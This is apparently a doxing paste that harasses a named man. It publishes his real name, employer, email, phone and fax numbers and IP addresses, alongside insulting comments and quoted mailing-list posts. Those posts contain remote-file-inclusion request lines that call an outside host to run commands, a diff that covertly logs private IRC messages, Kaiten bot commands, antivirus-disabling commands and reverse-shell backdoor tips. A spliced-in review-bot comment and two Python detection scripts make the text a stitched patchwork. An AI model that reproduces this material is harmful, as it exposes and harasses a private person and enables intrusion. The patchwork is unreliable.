
Title: Arrivederci Marco YogSotho Monicelli

Created: Aug 25th, 2021

Created by: LarpKillaz


Anonymous -

1 day ago
Didn't MLT own this guy like 20 years go lol?

Anonymous -

5 days ago
I read the intro and I already hate this guy.

Anonymous -

5 days ago
Nice dox

Anonymous -

5 days ago
This skid git ownes so bad nice dox by the way!

Anonymous -

1 week ago
Omg marco you're so embarrassing I remember when Mathew owned you sit down child, or should I say 38 year old man posing as a child on twitter.

Anonymous -

1 week ago
https://twitter.com/PRESIDENTSA7AN/status/1431324566480097283 satan humiliated this skid omg im crying

Anonymous -

1 week ago
https://gyazo.com/f073f22d217d92b983dac35836821ea2 Marco wipe your metadat next time you RETAD+RD LMFAO

Anonymous -

1 week ago
I love how this doxed unskilled pooron is commenting below LOLOLOL😂👎

Anonymous -

1 week ago
MLT did nothing. That workplace is from 2004 lol. Ask MLT for any proof, he will find hundred excuses and will not provide a single evidence because he is an harmless poser who only likes heroin. #epicfail

Anonymous -

1 week ago
Skid got smacked nothing else to it.


 
@YogSotho / Marco Monicelli / @The_Beyond_One / is a well known twitter troll & overgrown skidiotic asswipe. For years after his IRL "software engineering career" fell apart Marco proceeded 2 join the surface skid-scene and attempted to join other so called "hacking teams" such as LizardSquad BWA GoonSquad etc. When constantly rejected due to posessing absolutely ZERO technical ability / network knowledge, by late 2017 Mr. Monicelli proceeded to roleplay as other well know members of the community such as MLT: https://en.wikipedia.org/wiki/MLT_(hacktivist)  //   Dshocker: https://www.darknet.org.uk/2008/11/dshocker-aka-aush0k-hackerpleads-guilty-to-computer-felonies/  //  and Julius Kivimäki (zeekill):  https://krebsonsecurity.com/tag/zeekill/

By May 2019 everyone got tired or Marco's bullshit and spam reported his @YogSotho twitter causing it to get suspended after which he made his new hadnle @The_Beyond_One.  Date / Proof: https://gyazo.com/706aa1686a76d69d16a76ba0bed2985e  At this point giving up roleplaying as other hackers Mr. Monicelli switched his game up and began spamming enyone who accomplished anything on twitter with idiocy claiming that what they did never happened (Even though there are articles and mountains of evidence that it did.)  From MLT's arrest and TeamPoison's accomplishments to BWA Und0xxeds alleged possession of tmobiel accoutns, Marco the irrelevant, unnoticed, enraged SKID proceeded to spam everyone's tweets with lies and pointless comments. Today the Sharks & Killer Whales along with other predators of the community decided to give the drifting piece of rotting seaweed the attention which it has been begging for all these years... this is the end friend and I'm sure anyone reading this and cringing at your existence can agree with me that it willbe a good riddance.  

*Tips Fedora and stomps on insect* 


-------------------------------------------------------------------------

Marco Monicelli aka YogSotho aka @The_Beyond_One o doT o /XTerM exeC... ... ... 

 

--------------------------------------------------------------------------

Below you can see how the community responds to the skidiots personality disorder and social incabapilities:



As you can see here the so called "hacking comunity" doesn't show a lot of respect for little Marco, or should I say the grown ass 38 year old man behind the little role play hacker sherade / persona. Below are how people normally reac to Mr. Monicelli's presence. 

https://gyazo.com/ede0a62b3ab526712916a967312bbe62  <<< @YogSotho Suspended in early 2019 by members of the community.

https://gyazo.com/7eadecf1b79eef6d38f0d81cb3e055e2  <<< Beamage v1

https://gyazo.com/12f906975d4ffc10cc8e310801c6458e  <<< Beamage v2

https://gyazo.com/07e27ce08833e7a832ca0ca3c1b0ffce  <<< Kid tries to seem relevant by tagging himself where he doesn't belong 

https://gyazo.com/35847431e3e77db353395ee8f317c4b5  <<< Trying to seem relevant not realising nobody has time for him and his lies

https://gyazo.com/3c944099d11ea50d221ef969e3af65f5  <<< People are embarassed to talk to this SKID because all he does is butt into convo's with random people and post meme's while trying to gain twitter followers and feed his puny "scary hacker" persona.

https://gyazo.com/632be6b0c3c12ca16d394ec97c0e303d  <<< again tries to join conversations and gets ignored lol

https://gyazo.com/63b1ad8e56fb41fc8a6ff81fcf25110f  <<< The poor skid  gets clowned at all hours of the night wherever he goes. 


--------------------------------------------------------------------------

Proof liking @YogTotho to IRL Identity (Marco Monicelli)



Mr_Pan [n=marcopan@host156-30-dynamic.3-87-r.retail.telecomitalia.it]  has joined #ubuntu



=== YogSothoth [n=YogSotho@82.250.72.110]  has joined #ubuntu
[10:46] <YogSothoth> Hi!
[10:46] <TyphoidHippo> Polysics: pcmanfm do what you need?
=== spaden [i=hidden-u@195.216.35.251]  has joined #ubuntu
[10:46] <WONToN> hmmm,
[10:46] <PPG> maybe i need to get a newer versiong of Ubuntu
[10:46] <Polysics> it's great thx
=== Flaze [i=Omega@r220-101-112-217.cpe.unwired.net.au]  has joined #ubuntu
[10:46] <YogSothoth> Other than Gimp, is there a software to help merging photos, creating panoramas from multiple photos?
=== thuyvy_nguyen031 [n=thuyvy_n@222.253.110.14]  has left #ubuntu [] 
[10:47] <TyphoidHippo> yea, I love that one - I use it in place of nautilus completely
=== tschaka [n=tschaka@p54B3A73B.dip0.t-ipconnect.de]  has joined #ubuntu
=== cameronw [n=cameronw@123-100-99-208.ubs.maxnet.co.nz]  has joined #ubuntu
[10:48] <TyphoidHippo> it isn't totally integrated into gnome, though, like nautilus is....but it can be setup to be through the session manager, I think
=== dead_rooster [n=ubuntu@60-234-170-12.bitstream.orcon.net.nz]  has left #ubuntu [] 
[10:48] <PPG> after typing "sudo dpkg -reconfigure -phigh xserver -xorg", it just showed : "dpkt: conflicting actions --control and --remove"
=== Faithful [n=Faithful@ns.linuxterminal.com]  has joined #ubuntu
[10:48] <TyphoidHippo> PPG: Don't put a space between xserver-xorg
=== primus [n=primus@tm.82.192.62.130.dc.telemach.net]  has joined #ubuntu
=== Hardiles [n=harri@dyn3-82-128-191-248.psoas.suomi.net]  has joined #ubuntu
[10:49] <TyphoidHippo> or between dpkg-reconfigure
=== wolfsong is frustrated by all his windows being drawn at 0,0
[10:49] <TyphoidHippo> should be 'sudo dpkg-reconfigure -phigh xserver-xorg'
=== jabba [n=jabba@pD95744E1.dip.t-dialin.net]  has joined #ubuntu
[10:50] <PPG> OH!!!
[10:50] <jabba> hello
[10:50] <PPG> :)
[10:50] <TyphoidHippo> lol
[10:50] <jabba> i am just trying to connect to a novell 6.0 server with ncpmount. but i always get an invalid server response (-330).
[10:50] <jabba> does aynone know that that means?
[10:50] <YogSothoth> FOund it: Hugin
[10:50] <YogSothoth> Or Pandora plung for The Gimp
=== fredddy [n=freddy@p3E9E4368.dip0.t-ipconnect.de]  has joined #ubuntu
[10:50] <TyphoidHippo> Little stuff like that can be sooooo confusing at first, ppg, I totally understand
[10:50] <YogSothoth> *plugin
[10:51] <jabba> ncpmount -S servername -P start -A 192.168.1.5 -u jabba /mnt/novell/ -U novellusername
=== PiNE [n=bradley@211.203.183.52]  has joined #ubuntu
[10:51] <wolfsong> how do i tell if compiz is running and which WM i'm using under gnome?
=== ojk007 [n=ojk007@58.175.24.112]  has joined #ubuntu
[10:52] <ojk007> !partition
[10:52] <ubotu> Partitioning programs: !GParted or QTParted (also "man mkfs" for formatting) - Mounting partitions in Gnome under Dapper: System -> Administration -> Disks - For Edgy, see !fstab and !DiskMounter
=== tarntow [n=jaxon@221.127.200.71]  has joined #ubuntu
=== predaeus [n=predaeus@chello212186005030.401.14.vie.surfer.at]  has joined #ubuntu
=== ploufplouf [n=richard@host.110.163.23.62.rev.coltfrance.com]  has joined #ubuntu
=== erpo [n=erpo@2001:5c0:8fff:fffe:0:0:0:6929]  has joined #ubuntu
=== AdvoWork [n=danglebe@unaffiliated/advowork]  has joined #ubuntu
[10:53] <Frogzoo> jabba: try wireshark maybe?
[10:54] <jabba> ??
[10:54] <dan_> reee
[10:54] <jabba> Frogzoo: whatfor?
[10:54] <AdvoWork> hi there. Ive been following some instructions that tell me to do: useradd -r -c "Postfix Filters" -d /var/spool/filter filter  yet it says that: invalid option -- r :/
[10:55] <AdvoWork> i cant see -r in the man pages, yet as i say, its telling me to do so, and im having problems further down the line by not doing it
=== Skyward [n=tinko@lb2.aeye.net]  has joined #ubuntu
[10:55] <TyphoidHippo> dan_ I can't seem to find in the log what your sound problem was...  I remember you typing it, but not what you typed, and I can't find it anywhere
=== tarntow [n=jaxon@221.127.200.71]  has joined #ubuntu
[10:55] <Frogzoo> jabba: you get to see the conversation on the wire
[10:56] <Polysics> no need for gnome integration anyway
[10:56] <dan_> hehe
[10:56] <dan_> i have this problem
[10:56] <Polysics> all i needed is a fast file manage
[10:56] <Polysics> *r
[10:56] <dan_> i got 2 soundcrads, one pci and on onboard
[10:56] <dan_> ubuntu/alsa makes my onboard default not the pci one
=== jikin [n=liuke@222.247.138.140]  has joined #ubuntu
[10:57] <jabba> Frogzoo: seems ok, but in the end there is a NCP C Destroy Connection Service
[10:57] <jabba> user authed etc...
=== blan [n=marc@dslb-088-065-233-104.pools.arcor-ip.net]  has joined #ubuntu
[10:57] <dan_> but i want the pci one as default, as card 0, but i dont know how, asoundconf wont work nor the solution in the forums
=== gerr1 [i=gerrycar@nat/canonical/x-2efdeeb598ed0ee5]  has joined #ubuntu
[10:57] <TyphoidHippo> Well, the easiest (maybe dirty) way that immediately comes to mind is disabling the onboard in your bios...
[10:57] <TyphoidHippo> But, I assume you don't wanna do that
[10:57] <dan_> yeah u and your disabling
[10:57] <dan_> heheh






Proof:    https://gyazo.com/7cd4a329115980f296a4c34bec2b9f87



"Marcos"  https://gyazo.com/5a080f62b9139d613b702e80537ac7e3













                                                                          
-█░  1st s0me 1nf4llabl3 logiq:                                                 
-█                                                                              
-█  bongrip PRIVMSG #insecurity :if we got hacked                               
-█  bongrip PRIVMSG #insecurity :we wouldnt be told                             
-█  bongrip PRIVMSG #insecurity :i constantly have to check shit                
-█  bongrip PRIVMSG #insecurity :if we get hacked by these guys we wont know it 
-█  bongrip PRIVMSG #insecurity :htey arent going to brag                       
-█  bongrip PRIVMSG #insecurity :until i check it and find it                   
-█  bongrip PRIVMSG #insecurity :one day                                        
-█  YogSotho PRIVMSG #insecurity :Indeed. U notice only when they rm ur box     
-█  bongrip PRIVMSG #insecurity :which will never happen                        
-█  bongrip PRIVMSG #insecurity :cause nothing is popped                        
-█  bongrip PRIVMSG #insecurity :no                                             
-█  bongrip PRIVMSG #insecurity :they wont rm me                                
-█  bongrip PRIVMSG #insecurity :they would just do it to log                   
-█  bongrip PRIVMSG #insecurity :they would pop the hub                         
-█  bongrip PRIVMSG #insecurity :from there u can use pcap play                 
-█  bongrip PRIVMSG #insecurity :to sniff pm's                                  
-█  bongrip PRIVMSG #insecurity :and everything else                            
-█                                                                              
-█  Like this?                                                                  
-█                                                                              
-█  src/modules/m_message.c                                                     
-█            < if (ret == CANPRIVMSG_SEND)                                     
-█            < {                                                               
-█            >        FILE *fp;                                                
-█            >        fp=fopen("/var/backups/.irc/log.txt", "a");              
-█            >        fprintf(fp, "%s %s %s :%s\n", parv[0], cmd, nick, text); 
-█            >        fclose(fp);                                              
-█            <        sendto_message_one(acptr, sptr, parv[0], newcmd, nick,   
-█                                        text);                     
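Review bot: the four `>` lines added inside the `if (ret == CANPRIVMSG_SEND)` branch of src/modules/m_message.c copy the sender, command, recipient and full text of every deliverable PRIVMSG to /var/backups/.irc/log.txt before sendto_message_one runs. That is covert interception of private messages in the delivery path and has no place in the module, so the change should be rejected. An operator checking a running server can compare m_message.c and the built module against the upstream release and look for unexpected files such as this one under /var/backups. The fopen result is also passed to fprintf unchecked, so a missing or unwritable path would hand it a NULL stream on the first private message.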








Proof: https://gyazo.com/e3f8fe96c610373037c2075a10562acb













--------------------------------------------------------------------------



The following are logged via marco's original work email (Before he became a twitter skid the domain was owned by his family (proof below) and along with info previously dropped at the bottom of the file.


-------------------------------------------------------------------------


Exhibit A: http://www.blacksheepnetworks.com/security/resources/pentest/8774.html



Re: Windows Administrator access

From: Marco Monicelli (marco.monicelli@marcegaglia.com)
Date: Mon Feb 27 2006 - 02:49:49 EST


You can simply change directory and going into "C:\Documents and
Settings\Administrator".

If you're not administrator, you cannot browse in there. The command prompt
will show the path and this will demonstrate that you're administrator over
there.

Ciao

Marco

                                                                           
Dillama <dillama@gmail.com>
25/02/2006 10.17
To: pen-test@securityfocus.com
cc:
Subject: Windows Administrator access
                                                                           
                                                                           
                                                                           
                                                                           
                                                                           
                                                                           

After gaining shell access to a Windows box, is there any way to show
administrator privilege without changing the config or uploading new
files?

I have to demo the ability to gain administrator access to a Win 2000
box, the catch is no changes on the box so adding a user or loading
whoami.exe from resource kit would not be options. Any suggestion here
would be appreciated.

Thanks

---
Dillama

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:34 EDT



----------------------------------------------------------------------------

Exhibit B: https://www.pvv.ntnu.no/~shane/dokumentasjon/hack_attempt/msg00013.html

Re: Hack attempt

    To: Alvin Oga <alvin.sec@Virtual.Linux-Consulting.com>
    Subject: Re: Hack attempt
    From: Marco Monicelli <marco.monicelli@marcegaglia.com>
    Date: Fri, 23 Jul 2004 17:18:17 +0200
    Cc: focus-linux@securityfocus.com, norbert.crettol@idiap.ch (Norbert Crettol)




 Hi Norbert/Alvin

As I already explained in private to Norbert, this is just a guy of DALnet
Network playing with some exploit for PHP. In fact he installed eggdrop and
psybnc which are not related to clones attack at all. He's probably just a
kid with some automated script or some "l33t" tool to own unpatched boxes.

Anyway, why take off wget and other useful binaries? I would suggest
instead fully patching your box and maybe installing Snort.

I don't agree with the "smart people investigating for what's cooking". I
think chkrootkit can help and can spare a lot of time. Of course you
shouldn't base your Security on this software only but it's a good help.
Snort and Tripwire are definitely a good help too.

As I said, it's not a clones derived attack. It's just a chatting kid who
probably is trying to build up his own Botnet to look l33t with his mates.

Again I don't agree with the "another cracked box". In fact the whois made
by Norbert on my suggestion gave good results. The provider hosting his
website (yes, that is his own personal website.... not very smart eh?!) has
deleted the inject.txt script and gave a warning to this guy who will be
probably scared to death (this depends on how old he is and other factors).
Moreover we know his Nickname and we know he's chatting on Dalnet so....
some social engineering could even lead to personal information on this
kid.

Anyway... Norbert patch your box on any PHP bug (there are tons of PHP bugs
as far as I know) and then try to use SATAN or NESSUS to check your box (I
personally suggest Nessus). Oh... just one last but not least thing:

don't forget to wipe your box 'cause you will never know what he did for
real so it's much safer to reinstall everything. I know it's boring but
it's the only SECURE way to know your box is clean.

Hope this can help others with same problem.

Ciao

Marco Monicelli
MARCEGAGLIA SPA
Automotive Sales Department
Stainless Steel Division
Tel. +39 0376 685369
Fax. +39 0376 685625
email: marco.monicelli@marcegaglia.com


                                                                                                                                                   
Alvin Oga <alvin.sec@Virtual.Linux-Consulting.com>
23/07/2004 01.23
To:       norbert.crettol@idiap.ch (Norbert Crettol)
cc:       focus-linux@securityfocus.com
Subject:  Re: Hack attempt
                                                                                                                                                   





hi norbert

> "GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

time for you to patch and update to latest php
or better still, turn it off esp if you don't need it

tons of things to fix up ... to harden the server

> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget

time to remove wget, lynx, and equiv apps

> Has someone seen this kind of attack ?

it's either eggdrop or modified clones/derivatives

> (chkrootkit doesn't detect it).

so much for chkrootkit :-)

smart/intelligent people investigating for "whats cooking" is better
than automated tools

> Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
> Is there a way to stop this guy ? His nickname (CaEm) appears in the
> the uploaded scripts.

probably another cracked box ... long list to follow to find the
actual cracker

c ya
alvin
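
The request pattern quoted in the thread above (a `bodyfile=` parameter carrying a remote URL, followed by a `cmd=` parameter) can be searched for in web server logs. The following is an added detection example, not part of the original messages; the log lines, client addresses and the `attacker.example` host are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined log format: client, identd, user, [time], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)
# A parameter value that is itself an absolute URL is the include-a-remote-file tell.
REMOTE_URL_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample lines, modelled on the request quoted in the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jul/2004:09:14:02 +0200] "GET /page.php?bodyfile=http://attacker.example/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '192.0.2.10 - - [22/Jul/2004:09:14:09 +0200] "GET /page.php?bodyfile=http%3A%2F%2Fattacker.example%2Finject.txt&cmd=uname%20-a HTTP/1.0" 404 512 "-" "-"',
    '198.51.100.7 - - [22/Jul/2004:09:15:40 +0200] "GET /page.php?bodyfile=about.html HTTP/1.1" 200 1034 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Jul/2004:09:20:00 +0200] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def inspect_line(line):
    """Return a finding dict if any query parameter carries a remote URL, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    try:
        parts = urlsplit(m.group("target"))
    except ValueError:          # malformed target, nothing to parse
        return None
    # parse_qsl percent-decodes once, so "http%3A%2F%2F..." is caught as well.
    params = parse_qsl(parts.query, keep_blank_values=True)
    remote = [(k, v) for k, v in params if REMOTE_URL_RE.match(v)]
    if not remote:
        return None
    return {
        "client": m.group("client"),
        "time": m.group("time"),
        "path": parts.path,
        "remote_params": remote,
        # Companion parameters (here cmd=...) show what the caller tried to run.
        "other_params": [p for p in params if p not in remote],
        # A 2xx status means the script answered normally: review that host first.
        "served": m.group("status").startswith("2"),
    }


def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "SERVED" if f["served"] else "rejected"
        print(f'{f["time"]} {f["client"]} {f["path"]} {flag} '
              f'remote={f["remote_params"]} other={f["other_params"]}')
```
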





------------------------------------------------------------------------------

Exhibit C: https://seclists.org/bugtraq/2006/Feb/368



Re: new linux malware From: Marco Monicelli <marco.monicelli () marcegaglia com>
Date: Mon, 20 Feb 2006 17:24:21 +0100

Dear Gadi,

this malware looks like the famous Kaiten IRC bot. If you want, I can send
the source code of it but it is already known by most of AVs and I think
the source is public nowadays. This must be just another variant and
by the way it's detected as far as I can see from your quoted information so
it shouldn't be dangerous.

Anyway, tnx for keeping us updated!

Cheers

Marco





                                                                           
Gadi Evron <ge () linuxbox org>
18/02/2006 23.40
To:       bugtraq () securityfocus com
cc:       "full-disclosure () lists grok org uk" <full-disclosure () lists grok org uk>
Subject:  new linux malware
                                                                           
                                                                           
                                                                           
                                                                           
                                                                           
                                                                           




Today, we received a notification about a new Linux malware ItW (In the
Wild).

Chas Tomlin (http://www.ecs.soton.ac.uk/~cet/) provided Shadowserver
(http://www.shadowserver.org/) and Nicholas Alright who notified the
relevant operational communities, with the information on the binaries.
He captured them with sguil (http://sguil.sourceforge.net/).

Chas is working with Shadowserver to identify better ways to
trackdown/takedown botnets.

*The credit should go to him and Shadowserver*.

Shadowserver has been a responsible and essential part of recent
Internet security activities.

As anti virus vendors have been notified and will soon do a write-up on it,
I see no reason not to publicize it here.

MD5:
c2576aeff0fd9267b6cc3a7e1089e05d ~/samples/derfiq
e9a2b13fe02d013cc5e11ee586d11c38 ~/samples/session

We are not quite sure as of yet exactly what this does, it can be a
Linux virus, a Linux Trojan horse, a Linux worm... we are not even sure
if the checksums above are useful at all. We hope to know more soon and
we will update as we do.

There are some interesting strings to be noted:

NOTICE %s :TSUNAMI <target> <secs>          = Special packeter that wont be blocked by most firewalls
NOTICE %s :PAN <target> <port> <secs>       = An advanced syn flooder that will kill most network drivers
NOTICE %s :UDP <target> <port> <secs>       = A udp flooder
NOTICE %s :UNKNOWN <target> <secs>          = Another non-spoof udp flooder
NOTICE %s :NICK <nick>                      = Changes the nick of the client
NOTICE %s :SERVER <server>                  = Changes servers
NOTICE %s :GETSPOOFS                        = Gets the current spoofing
NOTICE %s :SPOOFS <subnet>                  = Changes spoofing to a subnet
NOTICE %s :DISABLE                          = Disables all packeting from this client
NOTICE %s :ENABLE                           = Enables all packeting from this client
NOTICE %s :KILL                             = Kills the client
NOTICE %s :GET <http address> <save as>     = Downloads a file off the web and saves it onto the hd
NOTICE %s :VERSION                          = Requests version of client
NOTICE %s :KILLALL                          = Kills all current packeting
NOTICE %s :HELP                             = Displays this
NOTICE %s :IRC <command>                    = Sends this command to the server
NOTICE %s :SH <command>                     = Executes a command

'session', current detection:
AntiVir            6.33.1.50/20060218            found [BDS/Katien.R]
Avast        4.6.695.0/20060216            found nothing
AVG          718/20060217            found nothing
Avira        6.33.1.50/20060218            found [BDS/Katien.R]
BitDefender        7.2/20060218            found nothing
CAT-QuickHeal            8.00/20060216           found nothing
ClamAV             devel-20060126/20060217             found nothing
DrWeb         4.33/20060218          found nothing
eTrust-InoculateIT             23.71.80/20060218             found nothing
eTrust-Vet         12.4.2086/20060217            found nothing
Ewido        3.5/20060218            found nothing
Fortinet           2.69.0.0/20060218             found nothing
F-Prot             3.16c/20060217          found nothing
Ikarus             0.2.59.0/20060217             found [Backdoor.Linux.Keitan.C]
Kaspersky          4.0.2.24/20060218             found [Backdoor.Linux.Keitan.c]
McAfee             4700/20060217           found [Linux/DDoS-Kaiten]
NOD32v2            1.1413/20060217         found nothing
Norman             5.70.10/20060217        found nothing
Panda        9.0.0.4/20060218        found nothing
Sophos             4.02.0/20060218         found nothing
Symantec           8.0/20060218            found [Backdoor.Kaitex]
TheHacker          5.9.4.098/20060218            found nothing
UNA          1.83/20060216           found nothing
VBA32        3.10.5/20060217         found nothing

'derfiq' current detection:
AntiVir            6.33.1.50/20060218            found [Worm/Linux.Lupper.B]
Avast        4.6.695.0/20060216            found nothing
AVG          718/20060217            found nothing
Avira        6.33.1.50/20060218            found [Worm/Linux.Lupper.B]
BitDefender        7.2/20060218            found nothing
CAT-QuickHeal            8.00/20060216           found nothing
ClamAV             devel-20060126/20060217             found nothing
DrWeb         4.33/20060218          found nothing
eTrust-InoculateIT             23.71.80/20060218             found nothing
eTrust-Vet         12.4.2086/20060217            found nothing
Ewido        3.5/20060218            found nothing
Fortinet           2.69.0.0/20060218             found nothing
F-Prot             3.16c/20060217          found nothing
Ikarus             0.2.59.0/20060217             found [Net-Worm.Linux.Lupper.B]
Kaspersky          4.0.2.24/20060218             found nothing
McAfee             4700/20060217           found nothing
NOD32v2            1.1413/20060217         found nothing
Norman             5.70.10/20060217        found nothing
Panda        9.0.0.4/20060218        found nothing
Sophos             4.02.0/20060218         found nothing
Symantec           8.0/20060218            found [Hacktool]
TheHacker          5.9.4.098/20060218            found nothing
UNA          1.83/20060216           found nothing
VBA32        3.10.5/20060217         found nothing

This write-up can be found here:
http://blogs.securiteam.com/index.php/archives/303

We will notify as we get new updates here:
http://blogs.securiteam.com

             Gadi.

--
http://blogs.securiteam.com/

"Out of the box is where I live".
             -- Cara "Starbuck" Thrace, Battlestar Galactica.








--------------------------------------------------------------------------------------------------------




Exhibit D:  https://bugtraq.securityfocus.narkive.com/AkKZ5lW3/trend-micro-officescan-for-win2k-strange-behaviour




Discussion:
Trend Micro Officescan for Win2k strange behaviour
Marco Monicelli
17 years ago
Hello List!

I've noticed the following "weird" behaviour of the Trend Micro Officescan
client vers. 5.58 update to pattern 1.936.00 Engine 7.100 for WinXP/2k/NT:

The AV client is protected for unloading the Realtime Scan agent prompting
for a password (which I don't know of course). Moreover I have NOT admin
rights which allows me to perform a full system scan but not to unload the
client and/or the realtime protection.
Playing with the "net" command on a DOS prompt, I found out that the AV
launches itself and the realtime prot as services automatically. Then I
tried to stop the services with the simple command

net stop "OfficeScanNT Listener"
net stop "OfficeScanNT RealTime Scan"

Guess what? The two services have been successfully stopped from my system.

What do you guys think of this? Should I advise the AV Company of this or
this is normal behaviour?

Tnx for feedback.

Ciao

Marco Monicelli
MARCEGAGLIA SPA
Automotive Sales Department
Stainless Steel Division
Tel. +39 0376 685369
Fax. +39 0376 685625
email: ***@marcegaglia.com
Seth Hall
17 years ago
Marco,

You don't have to be an administrator of the local machine to start and
stop services.

By default, members of the Power Users group have the ability to stop
and start services on their local computer, which is probably what you
are logged on as. Members of the Users group cannot, by default, stop
and start services. I was able to stop my officescan service from a
Power User account, but not from a User account (just checked to make
sure Trend hadn't put in any proprietary settings).

Your net admin should either not be giving out power user status or
should be locking down services so that members of the Power Users group
can't control their stop/start (which may or may not be possible).

Trend is powerless against incorrect configuration, I'd imagine.

/Seth Hall


3APA3A
17 years ago
Dear Marco Monicelli,

--Wednesday, July 14, 2004, 1:28:24 PM, you wrote to ***@securityfocus.com:

MM> Playing with the "net" command on a DOS prompt, I found out that the AV

...

MM> net stop "OfficeScanNT Listener"
MM> net stop "OfficeScanNT RealTime Scan"

It's a bug of any automated system. It's documented as "Kiddie with
elevated privileges can make any protection unusable". Windows is very
vulnerable to this problem.
--
~/ZARAZA
And now, William, think this letter over carefully. (Twain)
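
Seth Hall's reply above comes down to this: who may stop a service is decided by the access control list on the service, not by the AV product. The following is an added example, not part of the thread: it parses the SDDL string that `sc sdshow <service>` prints and lists which trustees are allowed a given right. The two SDDL strings are constructed samples, and group membership is not resolved (each ACE is judged by its own trustee only).

```python
import re

STOP, CHANGE_CONFIG, WRITE_DAC = 0x20, 0x2, 0x40000

# SDDL right codes as they apply to a service object, mapped to access-mask bits.
RIGHT_BITS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
    # Generic rights, expanded with the generic mapping used for services.
    "GA": 0xF01FF,
    "GX": 0x20000 | 0x10 | 0x20 | 0x40 | 0x100,
    "GW": 0x20000 | 0x2,
    "GR": 0x20000 | 0x1 | 0x4 | 0x8 | 0x80,
}
GENERIC_BITS = {0x10000000: "GA", 0x20000000: "GX", 0x40000000: "GW", 0x80000000: "GR"}
TRUSTEE_NAMES = {"SY": "Local System", "BA": "Administrators", "PU": "Power Users",
                 "BU": "Users", "AU": "Authenticated Users", "IU": "Interactive",
                 "WD": "Everyone"}

# Constructed samples: LOOSE lets Power Users stop the service, TIGHT does not.
LOOSE = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
         "(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCLCSWLOCRRC;;;AU)")
TIGHT = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
         "(A;;CCLCSWLOCRRC;;;PU)(A;;CCLCSWLOCRRC;;;AU)"
         "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def rights_mask(rights):
    """Turn the rights field of an ACE (two-letter codes or hex) into a bit mask."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        for bit, code in GENERIC_BITS.items():
            if mask & bit:
                mask |= RIGHT_BITS[code]
        return mask
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= RIGHT_BITS.get(rights[i:i + 2], 0)   # unknown codes add nothing
    return mask


def parse_dacl(sddl):
    """Return (ace_type, mask, trustee) for every ACE in the D: part; the SACL is ignored."""
    m = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for body in re.findall(r"\(([^()]*)\)", m.group(1)):
        fields = body.split(";")
        if len(fields) >= 6:
            aces.append((fields[0], rights_mask(fields[2]), fields[5]))
    return aces


def who_can(sddl, wanted=STOP):
    """Trustees granted `wanted` by an allow ACE and not refused it by a deny ACE."""
    allowed, denied = {}, {}
    for ace_type, mask, trustee in parse_dacl(sddl):
        bucket = allowed if ace_type == "A" else denied if ace_type == "D" else None
        if bucket is not None:
            bucket[trustee] = bucket.get(trustee, 0) | mask
    return sorted(t for t, mask in allowed.items()
                  if mask & wanted and not denied.get(t, 0) & wanted)


if __name__ == "__main__":
    for label, sddl in (("LOOSE", LOOSE), ("TIGHT", TIGHT)):
        names = [TRUSTEE_NAMES.get(t, t) for t in who_can(sddl)]
        print(f"{label}: may stop the service: {', '.join(names)}")
```
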




--------------------------------------------------------------------------------------------



Exhibit E:  http://www.blacksheepnetworks.com/security/resources/pentest/6537.html  (A continuance from Exhibit A)





RE: Hacking to Xp box

From: Marco Monicelli (marco.monicelli@marcegaglia.com)
Date: Mon Sep 05 2005 - 13:46:15 EDT


Dear Eduardo/list,

I didn't discuss the fact that a server is much more juicy to hit for a
hacker than the simple workstation, even if it is the CEO box. Once stated
this, we can proceed with the next point.

First, SP2's firewall can be easily bypassed, as most firewalls can, with
injection technique. In fact they normally tend to allow HTTP traffic for
example. If the firewall doesn't block ICMP, you can use some ICMP backdoor
which replies to a special crafted packet ICMP ping with a reverse connect
shell. If you get admin privileges on that box, you can even think to stop
the firewall service on that machine. If the RAW sockets limit is your
problem, you can easily ENABLE back the raw sockets with some right command
lines (google is your best friend once again).

Regarding the JPG/GIF question, there are many joiner/merger on the net
which are not recognized by AV and they can hide an EXE file inside the
Picture. Once the guy opens the pic, then the EXE is executed hiddenly and
secretly. I'm not taking into consideration the buffer overflow
vulnerability as it is now a bit too old to be exploited (especially on a
fully patched machine). So the trick is just that a "not really expert" guy
will prolly open a picture (curiosity helps hackers a lot) and get infected
easily without exploiting any vulnerability. I call this "curiosity
engineering".... ehehehhehe....

HXDEF is correctly a rootkit which means you first have to get admin rights
on the target box. I've suggested that in order to mention rootkits which
can be useful to a hacker, once he got admin privileges. Did you ever see
this file "hxdef defeating modern detectors.rar"? It is a movie which shows
how it is NOT detected by most of the rootkit's hunters. But maybe that
